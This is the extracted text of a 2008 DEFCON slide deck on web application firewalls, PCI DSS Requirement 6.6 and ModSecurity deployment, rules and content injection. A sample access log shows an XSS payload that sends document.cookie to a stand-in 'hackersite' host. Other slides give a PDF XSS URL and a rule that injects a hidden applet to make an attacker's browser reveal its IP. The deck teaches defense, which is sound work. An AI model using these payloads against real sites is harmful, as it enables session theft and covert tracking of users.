![Page 1: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/1.jpg)
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
The Wide World of WAFs
Ben Feinstein, CISSP GCFA
SecureWorks Counter Threat Unit™
DEFCON 16
August 8, 2008
![Page 2: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/2.jpg)
• Web Application Firewalls (WAFs)
• PCI Data Security Standard
� Requirement 6.6
� Why should you care?
• ModSecurity
What’s In This Talk?
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• ModSecurity
� Concepts
� Core Rules
• ModSecurity WAF Live Demos
� Reverse Proxy
� Embedded
� Content Injection in Response to Attack
![Page 3: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/3.jpg)
• Firewall operating at the web application layer
• Hardware or Software
• Fluent in many tongues
� HTTP / HTTPS
� XML
� SOAP
� XML-RPC
Web Application Firewalls (WAFs)The Basics
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� XML-RPC
� WS-*
• Performs normalization / de-obfuscation
• Detects attacks
• Blocks attacks
• Rewrites / Modifies requests and responses
![Page 4: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/4.jpg)
• Apache dynamically loadable module
• Dual License
� Community Edition - GPLv2
� Commercial License
• Created by Ivan Ristic
ModSecurity Web App FirewallsThe Basics
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• Created by Ivan Ristic
• Commercialized by Breach Security
• Core Rules released under GPLv2
![Page 5: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/5.jpg)
• I apologize in advance if I bore you
• PCI is driving adoption of WAF (and Web App Vulnerability Scanning)
• Pentesters (i.e. QSAs): PCI will drive your business. You will need to be familiar with WAFs to evaluate and subvert
Meet the Payment Card Industry! Why Should You Care?
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
will need to be familiar with WAFs to evaluate and subvert them.
• IT Security: You will be deploying WAFs because of PCI
• Blackhats: You will be subverting WAFs for fun and profit!
![Page 6: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/6.jpg)
• Lots of new acronyms, yea!
• PCI Security Standards Council (PCI)
• PCI Data Security Standard (PCI DSS)
• Other PCI security standards exist
Meet the Payment Card Industry! Terminology
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• Other PCI security standards exist
� PIN Entry Devices (PEDs)
� Payment Application Data (PA-DSS)
• Qualified Security Assessors (QSAs)
• Approved Scanning Vendors (ASVs)
![Page 7: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/7.jpg)
• Build and Maintain a Secure Network
• Protect Cardholder Data
• Maintain a Vulnerability Management Program
• Implement Strong Access Control Measures
PCI Data Security Standard v1.1The Basics
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• Implement Strong Access Control Measures
• Regularly Monitor and Test Networks
• Maintain an Information Security Policy
![Page 8: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/8.jpg)
• R6. "Develop & maintain secure systems and applications"
• R6.6. "Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
� Having all custom application code reviewed for common vulnerabilities by an organization that
PCI DSS Application / System SecurityRequirement 6
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
common vulnerabilities by an organization that specializes in application security
� Installing an application layer firewall in front of web-facing applications.
• Note: This method is considered a best practice until June 30, 2008, after which it becomes a requirement."
![Page 9: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/9.jpg)
• A way to reassign legal liability
� QSA assumes unlimited liability? (IANAL)
• Compliance rationale for bigger IT security budgets
• An economically dictated race to the bottom for ASVs?
PCI Data Security StandardWhat Does All This Really Mean?
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
![Page 10: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/10.jpg)
• Cost of a PCI ASV's Solution
• vs. that Solution's Ability to Find Issues (its Quality)
• vs. Cost of Remediating the Identified Findings
• vs. Loss Expectancy Due to Unidentified Issues
PCI Data Security StandardAn economically dictated race to the bottom for ASVs?
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• vs. Loss Expectancy Due to Unidentified Issues
• vs. Loss Expectancy Due to Unremediated Issues
• No market differentiator between a PCI stamp of approval granted by ASVs of varying quality!
![Page 11: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/11.jpg)
• Virtual Patching / Just-In-Time Patching
• Postive Security Model
� Input Validation Envelope
• Negative Security Model
� Enumerate the bad stuff
• Difficult to achieve the "positive input validation envelope"
ModSecurity Concepts
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• Difficult to achieve the "positive input validation envelope" in the real-world!
• "When you know nothing, permit-all is the only option. When you know something, default-permit is what you can and should do. When you know everything, default-deny becomes possible, and only then." – Richard Bejtlich(?), quoted in WhiteHat Security WP WAF061708
![Page 12: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/12.jpg)
• Request Headers
• Request Body
• Response Headers
• Response Body
More ModSecurity ConceptsProcessing Phases
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• Response Body
• Logging / Action
![Page 13: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/13.jpg)
• Can be nested / run in serial
• Replace Comments
� SQLi
• URL Encode / Decode
• Hex Encode / Decode
• JavaScript Decode
More ModSecurity ConceptsTransformations
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• JavaScript Decode
• HTML Entity Decode
• Uppercase / Lowercase
• MD5 / SHA1
• Normalize Paths
![Page 14: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/14.jpg)
• HTTP protocol protection
� RFCs
� Defined policy
• Common Web Attack Protections
� XSS, SQLi, CSRF, HTTP Response Splitting
• Automation Detection
� Bots, web crawlers, web scanners
ModSecurity Core Rules
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� Bots, web crawlers, web scanners
• Trojan Protection
• Server Error Hiding / DLP
� Mask errors sent by the server
� Data Loss Prevention
![Page 15: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/15.jpg)
• Request (a few important keywords)
� REQUEST_METHOD
� REQUEST_URI
� REQUEST_FILENAME
� QUERY_STRING
� REQUEST_HEADERS
� REQUEST_BODY
ModSecurity Rule Language Keywords
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� REQUEST_BODY
• Response (a few important keywords)
� RESPONSE_STATUS
� RESPONSE_BODY
� RESPONSE_HEADERS
� RESPONSE_CONTENT_TYPE
� RESPONSE_CONTENT_LENGTH
![Page 16: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/16.jpg)
• Content Injection
� "prepend" and "append"
� Embed one of Billy Hoffman's JS payloads in response to attack?
• Aho-Corasick pattern matching algorithm
� Improved performance when matching on large sets of
ModSecurity v2.5 Highlights
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� Improved performance when matching on large sets of patterns
• Cached transformations
• GeoIP lookup
� Use as matching criteria in rules
![Page 17: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/17.jpg)
• Credict Card verification on the wire
� @verifyCC rule operator, takes a regexp argument
� Luhn checksum algorithm
• PDF Universal XSS Protection
� http://www.example.com/file.pdf#a=javascript:alert('p0wn3d')
More ModSecurity v2.5 Highlights
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
wn3d')
� All PDFs on protected site get a one-time use URI
� Redirects visitors to the PDF
� Flushes any malicious JS in client's browser session
• Full Lua scripting w/ SecRuleScript directive
� Used to create more complex rules in Lua
![Page 18: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/18.jpg)
• Embedded
� Installed within Apache instance hosting site
• Reverse Proxy
� Use Apache mod_proxy
� Traffic is redirected to flow through WAF
DNS configuration
ModSecurity Web App FirewallDeployment Scenarios
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• DNS configuration
• Network-layer redirection
� Could be hosted "in the cloud"
� Supports use of Apache Virtual Hosts
![Page 19: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/19.jpg)
Apache Web Server
Embedded Deployment
www.example.comVirtualHost
SiteVisitor
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
ModSecurity DocumentRoot
![Page 20: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/20.jpg)
Apache Web Server
Embedded Deployment
www.example.comVirtualHost
Attacker
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
ModSecurity DocumentRoot
![Page 21: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/21.jpg)
Live Demo
ModSecurity Embedded Deployment
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
Live Demo
![Page 22: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/22.jpg)
Reverse Proxy Deployment
WAF
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
Site Visitor Web Server
HTTP Request
![Page 23: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/23.jpg)
Reverse Proxy Deployment
WAFHTTP ResponseHTTP
Request
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
Site Visitor Web Server
HTTP Request
HTTP Response
![Page 24: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/24.jpg)
Live Demo
ModSecurity Reverse Proxy Deployment
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
Live Demo
![Page 25: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/25.jpg)
• Credit to David (DKZA) Kierznowski, GNUCITIZEN
� http://www.gnucitizen.org/blog/content-injection-hack-the-hacker/
• Inject code snippets
� Defense
� Hijacking JS functions
ModSecurity Content Injection
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� Hijacking JS functions
• Redefine alert() with a Logger
� A looking glass into client's browser
![Page 26: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/26.jpg)
• The following rule will inject a Java Applet
• MyAddress will force attacker's browser to callback to us
• Reveals IP of the attacking host
� Works despite NAT
� Good, we might be only seeing IP of WAF in server log
Content InjectionAn Example
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� Good, we might be only seeing IP of WAF in server log
![Page 27: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/27.jpg)
SecContentInjection On
SecDefaultAction "log,deny,phase:2,status:500,t:none,setvar:tx.alert=1"
SecRule TX:ALERT "@eq 1" \
"phase:3,nolog,pass,chain,prepend:'<applet\
Content InjectionThe Rules
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
"phase:3,nolog,pass,chain,prepend:'<applet\code=\"MyAddress.class\" width=0 height=0> \<param name=\"url\" value=\"grab_ip.php?IP=\"> \<param name=\"action\" value=\"auto\"> \</applet>' "
SecRule RESPONSE_CONTENT_TYPE "^text/html"
![Page 28: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/28.jpg)
• Below is a snippet from Apache access_log on the server
• Reverse Proxy WAF has IP address is 10.0.0.10
• Attacker IP is 172.16.0.20
10.0.0.10 - - [30/May/2008:13:47:11 -0400] "GET /cgi-
bin/foo.cgi?param=<script>document.write('<img%20
src="http://hackersite/'+document.cookie+'"')</script>
Content InjectionApache Access Log
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
src="http://hackersite/'+document.cookie+'"')</script>
HTTP/1.1" 500 676
10.0.0.10 - - [30/May/2008:13:47:11 -0400] "GET /cgi-
bin/grab_ip.php?IP=172.16.0.20 HTTP/1.1" 404 207
![Page 29: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/29.jpg)
• "The Dream"
� Automated webapp vulnerability assessment (i.e., scanning) instantly mitigates identified flaws through automagic deployment of rules to WAFs.
• Until recently, not really feasible
� Web App VA generated too many false postives
VA + WAF= ??? + Profit !!!
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� Web App VA generated too many false postives
� Web App VA generated too many duplicates
� WAFs suffered under too many FPs and duplicates
• Vendors are trying again
![Page 30: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/30.jpg)
• Insecure Session Handling / Potential Cookie Tampering
� WAF can perform transparent cookie encryption/decryption
• Flaws in Business Logic
� Reliance on a predictable "random" number in URL to provide authentication and authorization
Limitations of WAFsIt’s Just A Tool, Not A Silver Bullet
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
provide authentication and authorization
• Can be solved with a WAF performing "URL encryption"
• Similar to ModSecurity protection against Universal PDF XSS
� Many flaws in business logic are very difficult to detect w/ automated tools…
� …and difficult to mitigate with a tool like a WAF
![Page 31: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/31.jpg)
• Vendors will continue to add WAF-like functionality
� Load Balancers
� Firewalls
� IPS and UTM devices
• WAF-like funtionality being wrapped into malware
� Many already contain SOCKS proxy functionality
The FutureSome Closing Thoughts
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
� Many already contain SOCKS proxy functionality
• Rogue / Malicious WAF Attacks
� WPAD-like attack vectors?
� WAF Poisoning?
• More WAF Bypass Vulnerabilities
![Page 32: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/32.jpg)
• WAFs from a attacker's perspective
• "Playing with Web Application Firewalls"
� Wendel Guglielmetti Henrique
� Fri 15:00-15:50, Track 2
• How to detect, fingerprint, and evade WAFs
A Plug
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
• How to detect, fingerprint, and evade WAFs
• I learned some stuff just reading the slides
![Page 33: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/33.jpg)
Thanks to DT, the Goons
and everyone who made
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
and everyone who made
DEFCON a reality this year!
![Page 34: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/34.jpg)
Greetz to DC404, Atlanta's DC Group!
Speakers: dr.kaos, Carric, David Maynor, Scott Moulton
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.
Speakers: dr.kaos, Carric, David Maynor, Scott Moulton
& Adam Bregenzer
And our very own Goon, dc0de!
![Page 35: The Wide World of WAFs - · PDF fileThe Wide World of WAFs ... An economically dictated race to the bottom for ASVs? ... • HTTP protocol protection RFCs Defined policy](https://reader033.vdocuments.mx/reader033/viewer/2022052711/5abac7427f8b9a76038bee58/html5/thumbnails/35.jpg)
Questions?
The Information Security ExpertsCopyright © 2008 SecureWorks, Inc. All rights reserved.